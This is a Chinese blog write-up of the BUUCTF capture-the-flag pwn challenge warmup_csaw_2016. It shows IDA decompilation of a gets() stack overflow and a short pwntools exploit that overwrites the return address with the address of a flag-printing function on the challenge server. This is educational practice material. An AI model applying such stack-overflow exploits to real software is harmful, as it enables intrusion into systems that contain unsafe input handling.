-
buuctf PWN warmup_csaw_2016
下载附件,IDA查看
发现直接有显示flag函数
- int sub_40060D()
- {
- return system("cat flag.txt");
- }
查看程序起始地址0x40060D
- ; Attributes: bp-based frame
- sub_40060D proc near
- ; __unwind {
- push rbp
- mov rbp, rsp
- mov edi, offset command ; "cat flag.txt"
- call _system
- pop rbp
- retn
- ; } // starts at 40060D
- sub_40060D endp
查看main函数
- __int64 __fastcall main(int a1, char **a2, char **a3)
- {
- char s[64]; // [rsp+0h] [rbp-80h] BYREF
- char v5[64]; // [rsp+40h] [rbp-40h] BYREF
- write(1, "-Warm Up-\n", 0xAuLL);
- write(1, "WOW:", 4uLL);
- sprintf(s, "%p\n", sub_40060D);
- write(1, s, 9uLL);
- write(1, ">", 1uLL);
- return gets(v5);
- }
发现函数gets(v5),是栈溢出
char v5[64]; // [rsp+40h] [rbp-40h] BYREF
看到v5占用64个位置
那就可以改写exp:
- from __future__ import absolute_import
- from pwn import *
- p=remote(u"node4.buuoj.cn",29692)
- payload=u'A'*64+u'B'*8+p64(0x40060D+1).decode(u"iso-8859-1")
- p.sendline(payload)
- p.interactive()
运行结果
-
相关阅读:
千万小心,99%的Java程序员会踩这些坑
2022年江岸区科技“小巨人”奖励补贴标准以及申报条件和时间汇总
mybatis 调用修改SQL时 出现了一个问题 没有修改成功也没有报错
深入理解计算机系统(CSAPP) —— 第二章 信息的表示和处理
postgres Full Page Write全页写机制
day-05 TCP半关闭 ----- DNS ----- 套接字的选项
【JavaEE初阶】 计算机是如何工作的
链表反转-LeetCode206
数商云供应链管理系统助力化工行业企业实现客户订单管理可视化
MySQL数据库入门到精通——进阶篇(3)
- 原文地址:https://blog.csdn.net/wp568/article/details/133557229